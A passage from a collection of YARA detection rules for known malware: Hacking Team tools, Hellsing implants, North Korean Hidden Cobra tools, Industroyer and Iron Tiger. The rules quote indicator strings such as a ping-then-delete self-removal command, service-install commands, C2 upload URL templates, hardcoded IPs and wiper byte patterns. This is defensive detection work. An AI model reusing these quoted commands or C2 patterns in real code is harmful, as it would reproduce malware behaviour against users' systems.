    $my_string_four = { 8B CF 0F AF CE 8B C6 99 2B C2 8B 55 08 D1 F8 03 C8 8B 45 FC 03 C2 89 45 10 8A 00 2B CB 32 C1 85 DB 74 07 }
    $my_string_five = "fuckyou1"
    $my_string_six = "xtool.exe"
  condition:
    ($my_string_one and $my_string_two) or ($my_string_three or $my_string_four) or ($my_string_five and $my_string_six)
}

rule bin_ndisk {
  meta:
    description = "Hacking Team Disclosure Sample - file ndisk.sys"
    author = "Florian Roth"
    reference = "https://www.virustotal.com/en/file/a03a6ed90b89945a992a8c69f716ec3c743fa1d958426f4c50378cca5bef0a01/analysis/1436184181/"
    date = "2015-07-07"
    hash = "cf5089752ba51ae827971272a5b761a4ab0acd84"
  strings:
    $s1 = "\\Registry\\Machine\\System\\ControlSet00%d\\services\\ndisk.sys" wide fullword
    $s2 = "\\Registry\\Machine\\System\\ControlSet00%d\\Enum\\Root\\LEGACY_NDISK.SYS" wide fullword
    $s3 = "\\Driver\\DeepFrz" wide fullword
    $s4 = "Microsoft Kernel Disk Manager" wide fullword
    $s5 = "ndisk.sys" wide fullword
    $s6 = "\\Device\\MSH4DEV1" wide fullword
    $s7 = "\\DosDevices\\MSH4DEV1" wide fullword
    $s8 = "built by: WinDDK" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 30720 and 6 of them
}

rule Hackingteam_Elevator_DLL {
  meta:
    description = "Hacking Team Disclosure Sample - file elevator.dll"
    author = "Florian Roth"
    reference = "http://t.co/EG0qtVcKLh"
    date = "2015-07-07"
    hash = "b7ec5d36ca702cc9690ac7279fd4fea28d8bd060"
  strings:
    $s1 = "\\sysnative\\CI.dll" ascii fullword
    $s2 = "setx TOR_CONTROL_PASSWORD" ascii fullword
    $s3 = "mitmproxy0" ascii fullword
    $s4 = "\\insert_cert.exe" ascii fullword
    $s5 = "elevator.dll" ascii fullword
    $s6 = "CRTDLL.DLL" ascii fullword
    $s7 = "fail adding cert" ascii fullword
    $s8 = "DownloadingFile" ascii fullword
    $s9 = "fail adding cert: %s" ascii fullword
    $s10 = "InternetOpenA fail" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and 6 of them
}

rule HackingTeam_Elevator_EXE {
  meta:
    description = "Hacking Team Disclosure Sample - file elevator.exe"
    author = "Florian Roth"
    reference = "Hacking Team Disclosure elevator.c"
    date = "2015-07-07"
    hash1 = "40a10420b9d49f87527bc0396b19ec29e55e9109e80b52456891243791671c1c"
    hash2 = "92aec56a859679917dffa44bd4ffeb5a8b2ee2894c689abbbcbe07842ec56b8d"
    hash = "9261693b67b6e379ad0e57598602712b8508998c0cb012ca23139212ae0009a1"
  strings:
    $x1 = "CRTDLL.DLL" ascii fullword
    $x2 = "\\sysnative\\CI.dll" ascii fullword
    $x3 = "\\SystemRoot\\system32\\CI.dll" ascii fullword
    $x4 = "C:\\\\Windows\\\\Sysnative\\\\ntoskrnl.exe" ascii fullword
    $s1 = "[*] traversing processes" ascii fullword
    $s2 = "_getkprocess" ascii fullword
    $s3 = "[*] LoaderConfig %p" ascii fullword
    $s4 = "loader.obj" ascii fullword
    $s5 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii
    $s6 = "[*] token restore" ascii fullword
    $s7 = "elevator.obj" ascii fullword
    $s8 = "_getexport" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 3072000 and all of ($x*) and 3 of ($s*)
}

rule RCS_Backdoor {
  meta:
    description = "Hacking Team RCS Backdoor"
    author = "botherder https://github.com/botherder"
  strings:
    $filter1 = "$debug3"
    $filter2 = "$log2"
    $filter3 = "error2"
    $debug1 = /\- (C)hecking components/ ascii wide
    $debug2 = /\- (A)ctivating hiding system/ ascii wide
    $debug3 = /(f)ully operational/ ascii wide
    $log1 = /\- Browser activity \(FF\)/ ascii wide
    $log2 = /\- Browser activity \(IE\)/ ascii wide
    $error1 = /\[Unable to deploy\]/ ascii wide
    $error2 = /\[The system is already monitored\]/ ascii wide
  condition:
    (2 of ($debug*) or 2 of ($log*) or all of ($error*)) and not any of ($filter*)
}

rule RCS_Scout {
  meta:
    description = "Hacking Team RCS Scout"
    author = "botherder https://github.com/botherder"
  strings:
    $filter1 = "$engine5"
    $filter2 = "$start4"
    $filter3 = "$upd2"
    $filter4 = "$lookma6"
    $engine1 = /(E)ngine started/ ascii wide
    $engine2 = /(R)unning in background/ ascii wide
    $engine3 = /(L)ocking doors/ ascii wide
    $engine4 = /(R)otors engaged/ ascii wide
    $engine5 = /(I)\'m going to start it/ ascii wide
    $start1 = /Starting upgrade\!/ ascii wide
    $start2 = /(I)\'m going to start the program/ ascii wide
    $start3 = /(i)s it ok\?/ ascii wide
    $start4 = /(C)lick to start the program/ ascii wide
    $upd1 = /(U)pdJob/ ascii wide
    $upd2 = /(U)pdTimer/ ascii wide
    $lookma1 = /(O)wning PCI bus/ wide
    $lookma2 = /(F)ormatting bios/ wide
    $lookma3 = /(P)lease insert a disk in drive A:/ wide
    $lookma4 = /(U)pdating CPU microcode/ wide
    $lookma5 = /(N)ot sure what's happening/ wide
    $lookma6 = /(L)ook ma, no thread id\! \\\\o\// wide
  condition:
    (all of ($engine*) or all of ($start*) or all of ($upd*) or 4 of ($lookma*)) and not any of ($filter*)
}

rule apt_hellsing_implantstrings {
  meta:
    Author = "Costin Raiu, Kaspersky Lab"
    Date = "2015-04-07"
    Description = "detection for Hellsing implants"
    Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
  strings:
    $mz = "MZ"
    $a1 = "the file uploaded failed !"
    $a2 = "ping 127.0.0.1"
    $b1 = "the file downloaded failed !"
    $b2 = "common.asp"
    $c = "xweber_server.exe"
    $d = "action="
    $debugpath1 = "d:\\Hellsing\\release\\msger\\" nocase
    $debugpath2 = "d:\\hellsing\\sys\\xrat\\" nocase
    $debugpath3 = "D:\\Hellsing\\release\\exe\\" nocase
    $debugpath4 = "d:\\hellsing\\sys\\xkat\\" nocase
    $debugpath5 = "e:\\Hellsing\\release\\clare" nocase
    $debugpath6 = "e:\\Hellsing\\release\\irene\\" nocase
    $debugpath7 = "d:\\hellsing\\sys\\irene\\" nocase
    $e = "msger_server.dll"
    $f = "ServiceMain"
  condition:
    ($mz at 0) and (all of ($a*)) or (all of ($b*)) or ($c and $d) or (any of ($debugpath*)) or ($e and $f) and filesize < 500000
}

rule apt_hellsing_installer {
  meta:
    Author = "Costin Raiu, Kaspersky Lab"
    Date = "2015-04-07"
    Description = "detection for Hellsing xweber/msger installers"
    Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
  strings:
    $mz = "MZ"
    $cmd = "cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\""
    $a1 = "xweber_install_uac.exe"
    $a2 = "system32\\cmd.exe" wide
    $a4 = "S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y="
    $a5 = "S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg="
    $a6 = "7dqm2ODf5N/Y2N/m6+br3dnZpunl44g="
    $a7 = "vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw=="
    $a8 = "vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSI Njl2tyI"
    $a9 = "C:\\Windows\\System32\\sysprep\\sysprep.exe" wide
    $a10 = "%SystemRoot%\\system32\\cmd.exe" wide
    $a11 = "msger_install.dll"
    $a12 = { 00 65 78 2E 64 6C 6C 00 }
  condition:
    ($mz at 0) and ($cmd and (2 of ($a*))) and filesize < 500000
}

rule apt_hellsing_proxytool {
  meta:
    Author = "Costin Raiu, Kaspersky Lab"
    Date = "2015-04-07"
    Description = "detection for Hellsing proxy testing tool"
    Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
  strings:
    $mz = "MZ"
    $a1 = "PROXY_INFO: automatic proxy url => %s "
    $a2 = "PROXY_INFO: connection type => %d "
    $a3 = "PROXY_INFO: proxy server => %s "
    $a4 = "PROXY_INFO: bypass list => %s "
    $a5 = "InternetQueryOption failed with GetLastError() %d"
    $a6 = "D:\\Hellsing\\release\\exe\\exe\\" nocase
  condition:
    ($mz at 0) and (2 of ($a*)) and filesize < 300000
}

rule apt_hellsing_xkat {
  meta:
    Author = "Costin Raiu, Kaspersky Lab"
    Date = "2015-04-07"
    Description = "detection for Hellsing xKat tool"
    Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
  strings:
    $mz = "MZ"
    $a1 = "\\Dbgv.sys"
    $a2 = "XKAT_BIN"
    $a3 = "release sys file error."
    $a4 = "driver_load error. "
    $a5 = "driver_create error."
    $a6 = "delete file:%s error."
    $a7 = "delete file:%s ok."
    $a8 = "kill pid:%d error."
    $a9 = "kill pid:%d ok."
    $a10 = "-pid-delete"
    $a11 = "kill and delete pid:%d error."
    $a12 = "kill and delete pid:%d ok."
  condition:
    ($mz at 0) and (6 of ($a*)) and filesize < 300000
}

rule apt_hellsing_msgertype2 {
  meta:
    Author = "Costin Raiu, Kaspersky Lab"
    Date = "2015-04-07"
    Description = "detection for Hellsing msger type 2 implants"
    Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
  strings:
    $mz = "MZ"
    $a1 = "%s\\system\\%d.txt"
    $a2 = "_msger"
    $a3 = "http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s"
    $a4 = "http://%s/data/%s.1000001000"
    $a5 = "/lib/common.asp?action=user_upload&file="
    $a6 = "%02X-%02X-%02X-%02X-%02X-%02X"
  condition:
    ($mz at 0) and (4 of ($a*)) and filesize < 500000
}

rule apt_hellsing_irene {
  meta:
    Author = "Costin Raiu, Kaspersky Lab"
    Date = "2015-04-07"
    Description = "detection for Hellsing msger irene installer"
    Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
  strings:
    $mz = "MZ"
    $a1 = "\\Drivers\\usbmgr.tmp" wide
    $a2 = "\\Drivers\\usbmgr.sys" wide
    $a3 = "common_loadDriver CreateFile error! "
    $a4 = "common_loadDriver StartService error && GetLastError():%d! "
    $a5 = "irene" wide
    $a6 = "aPLib v0.43 - the smaller the better"
  condition:
    ($mz at 0) and (4 of ($a*)) and filesize < 500000
}

rule apt_hiddencobra_rsakey {
  meta:
    description = "HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure"
    author = "US-CERT"
    url = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
  strings:
    $rsaKey = { 7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94 A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77 48 EE 6F 4B 9B 53 60 98 45 A5 28 65 8A 0B F8 39 73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2 AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED 39 3F FA D0 AD 3D D9 C5 3D 28 EF 3D 67 B1 E0 68 3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13 B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0 }
  condition:
    any of them
}

rule apt_hiddencobra_binaries {
  meta:
    description = "HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure"
    author = "US-CERT"
    url = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
  strings:
    $STR1 = "Wating" ascii wide
    $STR2 = "Reamin" ascii wide
    $STR3 = "laptos" ascii wide
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and 2 of them
}

rule apt_hiddencobra_urlbuilder {
  meta:
    description = "HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure"
    author = "US-CERT"
    url = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
  strings:
    $randomUrlBuilder = { 83 EC 48 53 55 56 57 8B 3D ?? ?? ?? ?? 33 C0 C7 44 24 28 B4 6F 41 00 C7 44 24 2C B0 6F 41 00 C7 44 24 30 AC 6F 41 00 C7 44 24 34 A8 6F 41 00 C7 44 24 38 A4 6F 41 00 C7 44 24 3C A0 6F 41 00 C7 44 24 40 9C 6F 41 00 C7 44 24 44 94 6F 41 00 C7 44 24 48 8C 6F 41 00 C7 44 24 4C 88 6F 41 00 C7 44 24 50 80 6F 41 00 89 44 24 54 C7 44 24 10 7C 6F 41 00 C7 44 24 14 78 6F 41 00 C7 44 24 18 74 6F 41 00 C7 44 24 1C 70 6F 41 00 C7 44 24 20 6C 6F 41 00 89 44 24 24 FF D7 99 B9 0B 00 00 00 F7 F9 8B 74 94 28 BA 9C 6F 41 00 66 8B 06 66 3B 02 74 34 8B FE 83 C9 FF 33 C0 8B 54 24 60 F2 AE 8B 6C 24 5C A1 ?? ?? ?? ?? F7 D1 49 89 45 00 8B FE 33 C0 8D 5C 11 05 83 C9 FF 03 DD F2 AE F7 D1 49 8B FE 8B D1 EB 78 FF D7 99 B9 05 00 00 00 8B 6C 24 5C F7 F9 83 C9 FF 33 C0 8B 74 94 10 8B 54 24 60 8B FE F2 AE F7 D1 49 BF 60 6F 41 00 8B D9 83 C9 FF F2 AE F7 D1 8B C2 49 03 C3 8B FE 8D 5C 01 05 8B 0D ?? ?? ?? ?? 89 4D 00 83 C9 FF 33 C0 03 DD F2 AE F7 D1 49 8D 7C 2A 05 8B D1 C1 E9 02 F3 A5 8B CA 83 E1 03 F3 A4 BF 60 6F 41 00 83 C9 FF F2 AE F7 D1 49 BE 60 6F 41 00 8B D1 8B FE 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FB 2B F9 8B CA 8B C1 C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7C 24 60 8D 75 04 57 56 E8 ?? ?? ?? ?? 83 C4 08 C6 04 3E 2E 8B C5 C6 03 00 5F 5E 5D 5B 83 C4 48 C3 }
  condition:
    $randomUrlBuilder
}

rule Malware_Updater {
  meta:
    Author = "US-CERT Code Analysis Team"
    Date = "2017/08/02"
    Incident = "10132963"
    MD5_1 = "8F4FC2E10B6EC15A01E0AF24529040DD"
    MD5_2 = "584AC94142F0B7C0DF3D0ADDE6E661ED"
    Info = "Malware may be used to update multiple systems with secondary payloads"
    super_rule = 1
    report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10132963.pdf"
    report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
  strings:
    $s0 = { 8A 4C 04 04 80 F1 5D 80 C1 71 88 4C 04 04 40 83 F8 10 7C EC }
    $s1 = { 8A 4D 00 80 F1 95 80 E9 7C 88 4D 00 45 4B 75 F0 }
  condition:
    any of them
}

rule Unauthorized_Proxy_Server_RAT {
  meta:
    Author = "US-CERT Code Analysis Team"
    Incident = "10135536"
    MD5_1 = "C74E289AD927E81D2A1A56BC73E394AB"
    MD5_2 = "2950E3741D7AF69E0CA0C5013ABC4209"
    Info = "Detects Proxy Server RAT"
    super_rule = 1
    report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF"
    report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
  strings:
    $s0 = { 8A 04 31 32 C2 88 04 31 25 FF 00 00 00 03 C2 99 F7 3D 40 40 49 00 A1 44 40 49 00 03 D0 41 3B CF 72 DE 5E 5F C3 }
    $s1 = { 8A 04 31 88 44 24 14 32 C2 88 04 31 8B 44 24 14 25 FF 00 00 00 03 C2 99 F7 3D 40 40 49 00 A1 44 40 49 00 03 D0 41 3B CF 72 D6 5E 5F C3 }
    $s2 = { 8A 04 31 88 44 24 14 32 C2 88 04 31 8B 44 24 14 25 FF 00 00 00 03 C2 99 F7 3D 5C 39 41 00 A1 60 39 41 00 03 D0 41 3B CF 72 D6 5E 5F C3 }
    $s3 = { 8A 04 31 32 C2 88 04 31 25 FF 00 00 00 03 C2 99 F7 3D 5C 39 41 00 A1 60 39 41 00 03 D0 41 3B CF 72 DE 5E 5F C3 }
    $s4 = { B9 1A 79 00 00 8A 14 07 80 F2 9A 88 10 40 49 75 F4 }
    $s5 = { 39 9F E1 92 76 9F 83 9D CE 9F 2A 9D 2C 9E AD 9C EB 9F D1 9C A5 9F 7E 9F 53 9C EF 9F 02 9F 96 9C 6C 9E 5C 9D 94 9F C9 9F }
    $s6 = { 8A 04 31 88 44 24 14 32 C2 88 04 31 8B 44 24 14 25 FF 00 00 00 03 C2 99 F7 3D 40 60 09 10 A1 44 60 09 10 03 D0 41 3B CF 72 D6 5E 5F C3 }
    $s7 = { 3C 5C 75 20 8A 41 01 41 84 C0 74 18 3C 72 74 0C 3C 74 74 08 3C 62 74 04 3C 22 75 08 8A 41 01 41 84 C0 75 DC }
    $s8 = { 8B 06 3D 95 34 12 00 77 35 3D 59 34 12 00 72 2E 66 8B 46 04 66 3D E8 03 7F 24 }
    $s9 = { 8B C8 8B 74 24 1C C1 E1 05 2B C8 8B 7C 24 18 C1 E1 04 8B 5C 24 14 03 C8 8D 04 88 8B 4C 24 20 83 F9 01 89 44 24 0C 75 23 }
    $s10 = { 8B 06 3D 90 34 12 00 77 35 3D 59 34 12 00 72 2E 66 8B 46 04 66 3D E8 03 7F 24 66 85 C0 }
    $s11 = { 30 11 0F B6 01 48 FF C1 02 C2 0F BE C0 99 41 F7 F9 41 03 D2 49 FF C8 75 E7 }
    $s12 = { 44 8B E8 B8 4F EC C4 4E 41 F7 ED C1 FA 03 8B CA C1 E9 1F 03 D1 6B D2 1A 44 2B EA 41 83 C5 41 }
    $s13 = { 8A 0A 80 F9 62 7C 23 80 F9 79 7F 1E 80 F9 64 7C 0A 80 F9 6D 7F 05 80 C1 0B EB 0D 80 F9 6F 7C 0A 80 F9 78 7F 05 }
  condition:
    any of them
}

rule NK_SSL_PROXY {
  meta:
    Author = "US-CERT Code Analysis Team"
    Date = "2018/01/09"
    MD5_1 = "C6F78AD187C365D117CACBEE140F6230"
    MD5_2 = "C01DC42F65ACAF1C917C0CC29BA63ADC"
    Info = "Detects NK SSL PROXY"
    report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF"
    report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
  strings:
    $s0 = { 8B 4C 24 08 8A 14 08 80 F2 47 80 C2 28 88 14 08 40 3B C6 7C EF 5E }
    $s1 = { 56 8B 74 24 0C 33 C0 85 F6 7E 15 8B 4C 24 08 8A 14 08 80 EA 28 80 F2 47 88 14 08 40 3B C6 7C EF 5E }
    $s2 = { 47 75 40 1F 71 34 35 74 79 75 36 68 67 76 68 69 37 5E 25 24 73 64 66 }
    $s3 = { 67 68 66 67 68 6A 75 79 75 66 67 64 67 66 74 72 }
    $s4 = { 6D 2A 5E 26 5E 67 68 66 67 65 34 77 65 72 }
    $s5 = { 31 71 61 7A 58 53 44 43 32 33 77 65 }
    $s6 = "ghfghjuyufgdgftr"
    $s7 = "q45tyu6hgvhi7^%$sdf"
    $s8 = "m*^&^ghfge4wer"
  condition:
    ($s0 and $s1 and $s2 and $s3 and $s4 and $s5) or ($s6 and $s7 and $s8)
}

rule r4_wiper_1 {
  meta:
    source = "NCCIC Partner"
    date = "2017-12-12"
    report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
    report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
  strings:
    $mbr_code = { 33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 5D 7C 33 C9 41 81 F9 00 ?? 74 24 B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 83 55 06 00 EB D5 BE 4D 7C B4 43 B0 00 CD 13 33 C9 BE 5D 7C EB C5 }
    $controlServiceFoundlnBoth = { 83 EC 1C 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 44 8B 44 24 24 53 56 6A 24 50 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 1C 8D 4C 24 0C 51 6A 01 56 FF 15 ?? ?? ?? ?? 68 E8 03 00 00 FF 15 ?? ?? ?? ?? 56 FF D3 57 FF D3 5E 5B 33 C0 5F 83 C4 1C C3 33 C0 5F 83 C4 1C C3 }
  condition:
    uint16(0) == 23117 and uint16(uint32(60)) == 17744 and any of them
}

rule r4_wiper_2 {
  meta:
    source = "NCCIC Partner"
    date = "2017-12-12"
    report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
    report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
  strings:
    $PhysicalDriveSTR = "\\\\.\\PhysicalDrive" wide
    $ExtendedWrite = { B4 43 B0 00 CD 13 }
  condition:
    uint16(0) == 23117 and uint16(uint32(60)) == 17744 and all of them
}

rule APT_Hikit_msrv {
  meta:
    author = "ThreatConnect Intelligence Research Team"
  strings:
    $m = { 6D 73 72 76 2E 64 6C 6C 00 44 6C 6C }
  condition:
    any of them
}

rule Industroyer_Malware_1 {
  meta:
    description = "Detects Industroyer related malware"
    author = "Florian Roth"
    reference = "https://goo.gl/x81cSy"
    date = "2017-06-13"
    hash1 = "ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910"
    hash2 = "018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81"
  strings:
    $s1 = "haslo.exe" ascii fullword
    $s2 = "SYSTEM\\CurrentControlSet\\Services\\%ls" wide fullword
    $s3 = "SYS_BASCON.COM" wide fullword
    $s4 = "*.pcmt" wide fullword
    $s5 = "*.pcmi" wide fullword
    $x1 = { 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61 00 67 00 65 00 50 00 61 00 74 00 68 00 00 00 43 00 3A 00 5C 00 00 00 44 00 3A 00 5C 00 00 00 45 00 3A 00 5C 00 00 00 }
    $x2 = "haslo.dat\x00Crash"
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of ($x*) or 2 of them)
}

rule Industroyer_Malware_2 {
  meta:
    description = "Detects Industroyer related malware"
    author = "Florian Roth"
    reference = "https://goo.gl/x81cSy"
    date = "2017-06-13"
    hash1 = "3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571"
    hash2 = "37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4"
    hash3 = "ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77"
    hash1 = "6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47"
  strings:
    $x1 = "sc create %ls type= own start= auto error= ignore binpath= \"%ls\" displayname= \"%ls\"" wide fullword
    $x2 = "10.15.1.69:3128" wide fullword
    $s1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" wide fullword
    $s2 = "/c sc stop %s" wide fullword
    $s3 = "sc start %ls" wide fullword
    $s4 = "93.115.27.57" wide fullword
    $s5 = "5.39.218.152" wide fullword
    $s6 = "tierexe" wide fullword
    $s7 = "comsys" wide fullword
    $s8 = "195.16.88.6" wide fullword
    $s9 = "TieringService" wide fullword
    $a1 = "TEMP\x00\x00DEF" wide fullword
    $a2 = "TEMP\x00\x00DEF-C" wide fullword
    $a3 = "TEMP\x00\x00DEF-WS" wide fullword
    $a4 = "TEMP\x00\x00DEF-EP" wide fullword
    $a5 = "TEMP\x00\x00DC-2-TEMP" wide fullword
    $a6 = "TEMP\x00\x00DC-2" wide fullword
    $a7 = "TEMP\x00\x00CES-McA-TEMP" wide fullword
    $a8 = "TEMP\x00\x00SRV_WSUS" wide fullword
    $a9 = "TEMP\x00\x00SRV_DC-2" wide fullword
    $a10 = "TEMP\x00\x00SCE-WSUS01" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and 1 of ($x*) or 3 of them or 1 of ($a*)) or (5 of them)
}

rule Industroyer_Portscan_3 {
  meta:
    description = "Detects Industroyer related custom port scaner"
    author = "Florian Roth"
    reference = "https://goo.gl/x81cSy"
    date = "2017-06-13"
    hash1 = "893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f"
  strings:
    $s1 = "!ZBfamily" ascii fullword
    $s2 = ":g/outddomo;" ascii fullword
    $s3 = "GHIJKLMNOTST" ascii fullword
    $d1 = "Error params Arguments!!!" wide fullword
    $d2 = "^(.+?.exe).*\\s+-ip\\s*=\\s*(.+)\\s+-ports\\s*=\\s*(.+)$" wide fullword
    $d3 = "Exhample:App.exe -ip= 127.0.0.1-100," wide fullword
    $d4 = "Error IP Range %ls - %ls" wide fullword
    $d5 = "Can't closesocket." wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 512000 and all of ($s*) or 2 of ($d*))
}

rule Industroyer_Portscan_3_Output {
  meta:
    description = "Detects Industroyer related custom port scaner output file"
    author = "Florian Roth"
    reference = "https://goo.gl/x81cSy"
    date = "2017-06-13"
  strings:
    $s1 = "WSA library load complite." ascii fullword
    $s2 = "Connection refused" ascii fullword
  condition:
    all of them
}

rule Industroyer_Malware_4 {
  meta:
    description = "Detects Industroyer related malware"
    author = "Florian Roth"
    reference = "https://goo.gl/x81cSy"
    date = "2017-06-13"
    hash1 = "21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561"
  strings:
    $s1 = "haslo.dat" wide fullword
    $s2 = "defragsvc" ascii fullword
    $a1 = { 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00 }
  condition:
    (uint16(0) == 23117 and filesize < 204800 and all of ($s*) or $a1)
}

rule Industroyer_Malware_5 {
  meta:
    description = "Detects Industroyer related malware"
    author = "Florian Roth"
    reference = "https://goo.gl/x81cSy"
    date = "2017-06-13"
    hash1 = "7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad"
  strings:
    $x1 = "D2MultiCommService.exe" ascii fullword
    $x2 = "Crash104.dll" ascii fullword
    $x3 = "iec104.log" ascii fullword
    $x4 = "IEC-104 client: ip=%s; port=%s; ASDU=%u " ascii fullword
    $s1 = "Error while getaddrinfo executing: %d" ascii fullword
    $s2 = "return info-Remote command" ascii fullword
    $s3 = "Error killing process ..." ascii fullword
    $s4 = "stop_comm_service_name" ascii fullword
    $s5 = "*1* Data exchange: Send: %d (%s)" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 409600 and (1 of ($x*) or 4 of them)) or (all of them)
}

rule IronTiger_ASPXSpy {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "ASPXSpy detection. It might be used by other fraudsters"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "ASPXSpy" ascii wide nocase
    $str2 = "IIS Spy" ascii wide nocase
    $str3 = "protected void DGCoW(object sender,EventArgs e)" ascii wide nocase
  condition:
    any of ($str*)
}

rule IronTiger_ChangePort_Toolkit_driversinstall {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - Changeport Toolkit driverinstall"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "openmydoor" ascii wide nocase
    $str2 = "Install service error" ascii wide nocase
    $str3 = "start remove service" ascii wide nocase
    $str4 = "NdisVersion" ascii wide nocase
  condition:
    uint16(0) == 23117 and (2 of ($str*))
}

rule IronTiger_ChangePort_Toolkit_ChangePortExe {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "Iron Tiger Malware - Toolkit ChangePort"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "Unable to alloc the adapter!" ascii wide nocase
    $str2 = "Wait for master fuck" ascii wide nocase
    $str3 = "xx.exe <HOST> <PORT>" ascii wide nocase
    $str4 = "chkroot2007" ascii wide nocase
    $str5 = "Door is bind on %s" ascii wide nocase
  condition:
    uint16(0) == 23117 and (2 of ($str*))
}

rule IronTiger_dllshellexc2010 {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "dllshellexc2010 Exchange backdoor + remote shell"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "Microsoft.Exchange.Clients.Auth.dll" ascii wide nocase
    $str2 = "Dllshellexc2010" ascii wide nocase
    $str3 = "Users\\ljw\\Documents" ascii wide nocase
    $bla1 = "please input path" ascii wide nocase
    $bla2 = "auth.owa" ascii wide nocase
  condition:
    (uint16(0) == 23117) and ((any of ($str*)) or (all of ($bla*)))
}

rule IronTiger_dnstunnel {
  meta:
    author = "Cyber Safety Solutions, Trend Micro"
    description = "This rule detects a dns tunnel tool used in Operation Iron Tiger"
    reference = "http://goo.gl/T5fSJC"
  strings:
    $str1 = "\\DnsTunClient\\" ascii wide nocase
    $str2 = "\\t-DNSTunnel\\" ascii wide nocase
    $str3 = "xssok.blogspot" ascii wide nocase
    $str4 = "dnstunclient" ascii wide nocase
